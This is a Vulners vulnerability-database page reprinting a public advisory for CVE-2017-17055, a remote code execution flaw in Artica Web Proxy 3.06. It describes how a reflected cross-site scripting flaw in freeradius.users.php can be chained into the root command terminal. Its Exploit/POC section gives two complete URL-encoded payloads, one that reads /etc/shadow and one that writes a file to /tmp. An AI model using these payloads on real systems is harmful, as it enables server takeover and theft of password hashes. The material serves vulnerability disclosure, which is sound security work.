Vulners
Lucene search
Artica Web Proxy 3.06.112216 Remote Code Execution Vulnerability
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | Artica Web Proxy 3.06 - Remote Code Execution Vulnerability | 1 Dec 201700:00 | – | zdt |
 | Artica Web Proxy Cross-Site Scripting Vulnerability | 4 Dec 201700:00 | – | cnvd |
 | Web Servers Code Execution Over HTTP Request Parameters (CVE-2017-17055) | 27 Sep 201800:00 | – | checkpoint_advisories |
| Artica Web Proxy Cross-site Scripting (CVE-2017-17055) | 27 Aug 201900:00 | – | checkpoint_advisories |
 | CVE-2017-17055 | 6 Dec 201716:00 | – | cve |
 | CVE-2017-17055 | 6 Dec 201716:00 | – | cvelist |
 | Artica Web Proxy 3.06 - Remote Code Execution | 1 Dec 201700:00 | – | exploitdb |
 | EUVD-2017-8222 | 7 Oct 202500:30 | – | euvd |
 | Artica Web Proxy 3.06 - Remote Code Execution | 1 Dec 201700:00 | – | exploitpack |
 | CVE-2017-17055 | 7 Dec 201702:29 | – | nvd |
10
[+] Credits: John Page (aka Hyp3rlinX)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/ARTICA-WEB-PROXY-v3.06-REMOTE-CODE-EXECUTION-CVE-2017-17055.txt
Vendor:
=======
www.articatech.com
Product:
=========
Artica Web Proxy v.3.06.112216
Artica Tech offers a powerful but easy-to-use Enterprise-Class Web Security and Control solution,
usually the preserve of large companies. ARTICA PROXY Solutions have been developed over the past
10 years as an Open Source Project to help SMEs and public bodies protect both their organizations
and employees from risks posed by the Internet.
Vulnerability Type:
===================
Remote Code Execution
CVE Reference:
==============
CVE-2017-17055
Security Issue:
================
Artica offers a web based command line emulator 'system.terminal.php' (shell), allowing authenticated users to execute OS commands as root.
However, artica fails to sanitize the following HTTP request parameter $_GET["username-form-id"] used in 'freeradius.users.php'.
Therefore, authenticated users who click an attacker supplied link or visit a malicious webpage, can result in execution of attacker
supplied Javascript code. Which is then used to execute unauthorized Operating System Commands (RCE) on the affected Artica Web Proxy Server
abusing the system.terminal.php functionality. Result is attacker takeover of the artica server.
Exploit/POC:
=============
1) Steal artica Server "/etc/shadow" password file.
https://VICTIM-IP:9000/freeradius.users.php?username-form-id=%3C%2Fscript%3E%3Cscript%3Evar%20xhr=new%20XMLHttpRequest();xhr.onreadystatechange=function(){if(xhr.status==200){alert(xhr.responseText);}};xhr.open(%27POST%27,%27https://VICTIM-IP:9000/system.terminal.php%27,true);xhr.setRequestHeader(%27Content-type%27,%27application/x-www-form-urlencoded%27);xhr.send(%27cmdline=cat%20/etc/shadow%27);%3C%2Fscript%3E%3Cscript%3E
2) Write file 'PWN' to /tmp dir.
https://VICTIM-IP:9000/freeradius.users.php?username-form-id=%3C%2Fscript%3E%3Cscript%3Evar%20xhr=new%20XMLHttpRequest();xhr.onreadystatechange=function(){if(xhr.status==200){alert(xhr.responseText);}};xhr.open(%27POST%27,%27https://VICTIM-IP:9000/system.terminal.php%27,true);xhr.setRequestHeader(%27Content-type%27,%27application/x-www-form-urlencoded%27);xhr.send(%27cmdline=touch%20/tmp/PWN%27);%3C%2Fscript%3E%3Cscript%3E
# 0day.today [2018-03-12] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Dec 2017 00:00Current
0.3Low risk
Vulners AI Score0.3
EPSS0.0356